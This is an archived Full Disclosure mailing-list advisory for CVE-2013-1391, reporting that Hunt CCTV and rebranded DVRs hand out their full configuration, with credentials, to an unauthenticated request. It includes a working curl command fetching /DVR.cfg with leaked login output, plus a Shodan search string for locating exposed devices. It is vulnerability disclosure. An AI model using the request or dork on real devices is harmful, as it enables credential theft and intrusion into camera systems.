Full Disclosure mailing list archives

By Date By Thread Hunt CCTV (and generics brands) Insufficient Authentication From: "A. Ramos" <aramosf () gmail com>

Date: Mon, 28 Jan 2013 08:41:31 +0100

Hunt CCTV (and generics brands) Insufficient Authentication January 17, 2013 - A. Ramos <aramosf @ gmail . com> -- CVE ID: CVE-2013-1391 [reserved] -- Affected Vendors: Hunt CCTV (http://www.huntcctv.com/) ** generic brands from Hunt ** Capture CCTV (http://www.capturecctv.ca/) NoVus CCTV (http://www.novuscctv.com/) Well-Vision Inc (http://well-vision.com/) -- Affected Models: DVR-04 / DVR-04CH (HuntCCTV) DVR-04NC (HuntCCTV) DVR-08 / DVR-08CH (HuntCCTV) DVR-08NC (HuntCCTV) DVR-16 / DVR-16CH (HuntCCTV) CDR 0410VE (CaptureCCTV-HuntCCTV) CDR 0820VDE (CaptureCCTV-HuntCCTV) DR6-704A4H (HuntCCTV) DR6-708A4H (HuntCCTV) DR6-7316A4H (HuntCCTV) DR6-7316A4HL (HuntCCTV) HDR-04KD (unknown-HuntCCTV) HDR-08KD (unknown-HuntCCTV) HV-04RD PRO (Hachi-HuntCCTV) HV-08RD PRO (Hachi-HuntCCTV) NV-DVR1204 (NovusSec) NV-DVR1208 (NovusSec) NV-DVR1216 (NovusSec) TW-DVR604 (Well Vision INC Solutions-HuntCCTV) TW-DVR616 (Well Vision INC Solutions-HuntCCTV) Shodan dork: Basic realm="DVR" server: httpd -mini Shodan results: 46890 Vulnerable: >70% -- Vulnerability Details: You can get the entire backup config with simple GET. No authentication required. All information are in clear text: admin panel, ddns config, ppoe credentials, misc. Example: [aramosf@velouria data]$ curl -v http://x.x.x.x/DVR.cfg | strings |grep -i USER * Trying x.x.x.x... connected * Connected to x.x.x.x (x.x.x.x) port 80 (#0) GET /DVR.cfg HTTP/1.1 User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/ 3.13.1.0 zlib/1.2.3 libidn/1.18 libssh2/1.2.2 Host: x.x.x.x Accept: */* < HTTP/1.0 200 Ok < Server: httpd < Date: Fri, 17 Jan 2013 05:47:02 GMT < Cache-Control: no-cache < Pragma: no-cache < Expires: 0 < Connection: close < Content-Type: application/octet-stream < USER1_USERNAME=iam USER1_PASSWORD=sexy Vulnerable firmware (127 different ones): - 1.1.10 to 1.1.92 - 1.47 to 1.51 - 2.0.0 to 2.1.93 - 3.0.04 to 3.1.92 -- Disclosure Timeline: 2011-09-?? - Vulnerability discovered 2012-12-20 - Published in the book "Hacker Epico" ( http://www.hackerepico.com) 2013-01-15 - CVE Assigned 2013-01-20 - Vulnerability reported to vendor 2013-01-24 - Vulnerability reported to GDT (Spain) 2013-01-28 - Public disclosure: http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html -- Alejandro Ramos www.securitybydefault.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ By Date By Thread Current thread: Hunt CCTV (and generics brands) Insufficient Authentication A. Ramos (Jan 28)